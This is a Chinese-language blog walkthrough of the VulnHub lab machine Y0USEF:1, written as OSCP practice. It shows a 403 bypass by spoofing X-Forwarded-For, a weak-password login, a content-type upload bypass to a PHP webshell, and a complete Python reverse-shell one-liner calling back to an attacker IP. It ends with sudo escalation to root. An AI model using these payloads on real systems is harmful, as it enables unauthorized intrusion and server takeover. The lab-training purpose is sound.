vulnhub:Y0USEF

已于 2022-06-26 21:22:21 修改
阅读量873 收藏 2
点赞数 2
分类专栏: kali OSCP 文章标签: 安全 安全性测试 web安全
于 2022-06-26 21:21:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjstang/article/details/125474420
版权
OSCP 同时被 2 个专栏收录
9 篇文章 0 订阅
订阅专栏
kali
5 篇文章 0 订阅
订阅专栏

一、前言

OSCP-4:主要利用方式:403请求绕过+文件上传绕过+RCE反弹shell

二、靶机信息

    靶场: vulnhub.com

    靶机名称: Y0USEF:1

    难度: 中等

    发布时间: 2020 年 12 月 10 日

    下载地址:https://www.vulnhub.com/entry/y0usef-1,624/

    备注:403bypass是一个坑,文件绕过此处略微简单,

              RCE用一句话木马进行命令执行反弹shell可以再琢磨琢磨

三、虚拟机配置

这次采用的VirtualBox虚拟机,网络连接模式为:NAT模式、DHCP服务:启用、IP地址:自动分配

 

四、信息收集

1、探测靶机ip地址

└─$ sudo arp-scan -I eth0 -l

 

2、探测靶机ip端口开放及开放端口的详细服务

└─$ sudo nmap -p- 10.0.2.5 

└─$ sudo nmap -p22,80 10.0.2.5

3、常规扫描目录

└─$ dirsearch -u 10.0.2.5

4、扫描发现,有一个adminstration的目录,进行访问,结果显示权限不足

http://10.0.2.5/adminstration/

5、通过403bypass,通常情况下,出现403的响应码有四种方式可以绕过(旁站访问,路径覆盖,Referer绕过和X-Forwarded-For绕过)这里用X-Forwarded-For: 127.0.0.1即可绕过

五、漏洞利用

6、出现了登录及密码输入框,进行弱口令尝试,admin,admin

7、成果登录进来,但每个页面的请求都需要带上X-Forwarded-For: 127.0.0.1    并发现一处文件上传的地方

8、通过测试,上传文件功能可拿shell,此功能只需小小的绕过,将content-type改为图片属性即可

9、通过测试,传入id参数,返回uid,可判断此处可以RCE。

http://10.0.2.5/adminstration/upload/files/1653921355secid.php?cmd=id

10、通过python反弹shell ,攻击机开启5555端口监听,浏览器访问,shell反弹成功。

http://10.0.2.5/adminstration/upload/files/1653921355secid.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

11、通过反弹的shell,查询id、查询第一个flag:user.txt 

www-data@yousef-VirtualBox:/var/www/html/adminstration/upload/files$ id

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@yousef-VirtualBox:/var/www/html/adminstration/upload/files$ cd /home

cd /home

www-data@yousef-VirtualBox:/home$ ls

ls

user.txt

yousef

www-data@yousef-VirtualBox:/home$ cat user.txt 

cat user.txt

c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

12、判断flag是通过base64加密,解密后发现是ssh登录的账号密码

ssh :

user : yousef

pass : yousef123

六、提权

13、既然是SSH,于是进行ssh登录,登陆之后,查看了sudo,发现所有的操作都可进行

14、直接 sudo -s   提到 root权限,并且验证ip(ip a) 归属于靶机。

15、最后提取root.txt falg ,同解base64即可

WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx

此靶场到此结束!~

cjstang
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fsf-ft-11-MERN-starter
03-05
npm init -y npm install express mongoose 生成Express应用 需要快递 创建一个Express实例 将服务器端口设置为3001 听PORT 添加中间件 app . use ( express . urlencoded ( { extended : true } ) ) ; app . ...
RGIT-annual-asset-depreciation-App:使用双倍余额递减和年数总和法评估公司资产的年度折旧的应用程序
03-21
RGIT的财务人员希望您开发一个应用程序,该应用程序将使用双倍余额递减和年数总和法评估公司资产的年度折旧。 The Financial officer will enter the asset’s ...It also provides a list box for selecting the usef
Vulnhub_y0usef
qq_45434762的博客
01-12 395
发现目标主机使用nmap扫描整个网段,发现目标主机nmap 192.168.1.0/24 通过简单的扫描发现目标主机开放了22和80端口使用nmap再对目标主机进行详细的探测,发现任然只...
vulnhub-y0usef
m0_62008601的博客
09-18 407
简单的渗透练习
Vulnhub--y0usef
weixin_45168704的博客
06-15 214
y0usef
vulnhub--y0usef
weixin_45922278的博客
02-01 331
y0usef 一、信息收集 1.namp扫描: 发现开了http、ssh服务。 访问192.168.0.101:80。网页为空。 2.御剑后台扫描: ./adminstration 目录较为特殊 403 :服务器理解客户的请求,但拒绝处理它,通常由于服务器上文件或目录的权限设置导致的WEB访问错误。 二、尝试越权 1.X-Forwarded-For: 头部带上x-forwarded-for:127.0.0.1,伪装成本地访问。 2.burp暴力破解: 带上头
vulnhub靶机-Y0USEF: 1
臭nana的博客
12-17 1268
1、找到靶机ip:192.168.75.11 nmap -sn 192.168.75.0/24 2、扫描靶机端口 root@chounana:~# nmap -p- -A 192.168.75.11 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.75.11 Host is up (0.00038s latency). Not shown: 65533 closed ports PORT STATE
realtek sdk编译总结.zip_laughq61_pairfem_realtek sdk_realtek 编译_usef
07-13
在本文中,我们将深入探讨如何编译Realtek SDK(软件开发套件)源码,这是一个对硬件设备开发至关重要的步骤。Realtek SDK包含了用于开发基于Realtek芯片的软件应用程序的各种库、驱动和工具。编译过程涉及到配置...
DevExpress使用技巧
03-16
正确示例:while (this.ribbonControl.Pages.Count > 0) { ribbonControl.SelectedPage = ribbonControl.Pages[0]; ribbonControl.Pages.Remove(ribbonControl.SelectedPage); } // 运行正常 四、RIBBON 问题汇集 ...
DevExpress重用技巧
09-17
4. **禁用F10键提示**:若不希望F10键激活菜单,可以设置`RibbonControl.Manager.UseF10KeyForMenu`为`false`: ```csharp ribbonControl.Manager.UseF10KeyForMenu = false; ``` 5. **更改按钮图标**:DX按钮的...
vulnhub靶机--y0usef(难度:easy)
weixin_46107179的博客
04-20 2135
靶机下载地址:下载链接 主机发现 通过arp-scan -l扫描得到靶机的IP地址为10.0.2.4 信息搜集 通过nmap扫描,可以得到靶机只开启了22,80端口(ssh,Apache服务) 打开浏览器访问,发现这个站点还在建设中,但是服务器在运行中 尝试了robots.txt,发现没有该文件,查看源代码也没有什么发现,于是,再用dirsearch扫描一下目录,发现基本上是403,可能权限不够,访问其他200的响应码发现与开始的主页面一样 但是还有一个adminstration的目录,进行访问,结
vulnhub靶场-y0usef
qq_42947816的博客
03-08 855
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
kali之vulnhub,y0usef
weixin_54431413的博客
05-21 579
主要学到了,一、针对403拒绝访问不要直接放弃渗透,而是尝试一些替换主机头host,URL覆盖,referer来源,一些反向代理头的修改,列如:x-forwarded-for。 二、文件上传mine类型的绕过
每周打靶VulnHub靶机-y0usef
m0_54178755的博客
10-05 120
每周打靶VulnHub靶机-y0usef
y0usef靶机之403 Bypass、文件上传及绕过
qq_40898302的博客
05-18 302
将 X-Forwarded-For: 127.0.0.1 请求头。2、Content-Type头部更改 image/png。打靶目标:取得 root 权限 + 2 Flag。bash64解密获取yousef用户账号密码。1、文件扩名 .php .jsp。3、在数据段位置添加图片头部信息。修改Content-Type。方式三:以认证过的地址访问。yousef有root权限。方法四:(以X打头的)对POC进行URL编码。登录yousef账户。
记一次403绕过技巧
mingyqf的博客
04-24 6930
记一次403绕过技巧 文章目录记一次403绕过技巧姿势一: 端口利用姿势二:修改HOST姿势三:覆盖请求URL姿势四:Referer标头绕过姿势五:代理IP姿势六:扩展名绕过 背景 记一次接到客户的一个需求,后台管理地址(https://xxx.xxxx.com)仅允许工作区公网出口访问,对于IP的访问限制是否存在缺陷可以绕过,外网进行访问返回403状态码。 实战 姿势一: 端口利用 拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web
403ByPass总结
LainWith的博客
08-17 9786
直接访问网站如下图,这里使用vulnhub靶机“Y0USEF: 1”为例,介绍几种403ByPass的手段。应该使用方法3探知网站,避免全程绕过导致渗透报告上少了漏洞一旦确认403 ByPass如果后期需要BP,直接采用方法3,或者直接方法2(关闭方法3的插件)如果后期不需要BP,直接方法1。...
Vulnhub靶场】通过sql注入漏洞,文件上传漏洞拿下网站webshell
weixin_45619494的博客
10-12 658
00 页面没变化?发现上传的路径没法知道,用7kbscan扫描,发现http://192.168.93.132/admin/uploads,进入。点击test,发现多了个图片,上面url变成http://192.168.93.132/cat.php?返回首页,检查源代码,发现图片的变化是通过id的变化来改变的。
渗透技巧之403绕过_指纹识别
热门推荐
N的博客
03-14 7万+
渗透技巧之403绕过_指纹识别
Capacity mismatch for disk D:\xuniji\baji\y0usef\\y0usef-disk1.vmdk。
最新发布
04-28
"Capacity mismatch for disk D:\xuniji\baji\y0usef\y0usef-disk1.vmdk" 是一个错误提示,意味着磁盘容量不匹配。这通常发生在虚拟机或虚拟磁盘的配置中。 可能的原因是,虚拟磁盘文件的容量与虚拟机配置中指定的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值